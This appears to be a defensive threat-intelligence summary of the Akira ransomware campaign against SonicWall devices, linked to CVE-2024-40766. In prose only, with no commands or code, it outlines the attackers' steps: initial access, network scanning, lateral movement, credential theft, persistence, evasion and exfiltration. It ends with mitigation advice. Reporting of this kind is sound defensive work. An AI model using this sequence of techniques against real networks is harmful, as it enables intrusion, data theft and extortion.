Since July 2025, the Akira ransomware campaign has been exploiting SonicWall NSA and TZ series devices running SonicOS 6-8. Researchers suspect the attackers are using credentials stolen from the CVE-2024-40766 vulnerability, as the exploits remain effective even after firmware updates. The attacks are notable for their speed and sophistication, often spreading rapidly across networks after a successful login. Attackers bypass OTP MFA, suggesting they may have stolen valid credentials or OTP seeds. The initial logins frequently originate from suspicious sources like VPS providers or privacy VPNs, which is a red flag for network administrators.
Once inside a network, the attackers move with incredible speed. Within minutes of gaining access, they begin internal network scanning using tools like SoftPerfect and Advanced IP Scanner, targeting common ports. They use Impacket and RDP for lateral movement and deploy various tools like nltest, dsquery, and BloodHound for Active Directory enumeration. All reconnaissance files are systematically saved to temporary directories like C:\ProgramData or Temp, showing a highly organized approach to mapping the victim’s environment before further compromise.
he attackers also focus on finding and extracting valuable data, including VM storage and backups, which often contain sensitive information and domain credentials. They use specialized tools to extract and decrypt Veeam credentials, and they even temporarily alter PostgreSQL configurations to facilitate their operations. To maintain persistence, the attackers create local and domain admin accounts, install Remote Monitoring and Management (RMM) tools like AnyDesk and TeamViewer, and establish covert access using SSH reverse tunnels and Cloudflare Tunnel.
To avoid detection, the attackers use a range of sophisticated evasion techniques. They disable RMMs and delete Volume Shadow Copies to hinder recovery. They also attempt to disable Windows Defender and other EDR solutions and have even been seen using a BYOVD (Bring Your Own Vulnerable Driver) technique, repackaging legitimate Microsoft files to disguise their activities. After packaging files for exfiltration using WinRAR, they use tools like rclone or FileZilla to transfer the archives to VPS hosts.
The final step of the attack is the deployment of the Akira ransomware executable. The ransomware is often placed in multiple locations and encrypts the entire environment within a few hours. Due to the high-stakes nature of these attacks, the most critical mitigation is to immediately reset all SSL VPN credentials on any SonicWall device that has ever run a firmware vulnerable to CVE-2024-40766. This also includes resetting Active Directory credentials for all accounts used for SSL VPN access and LDAP synchronization.
Reference:
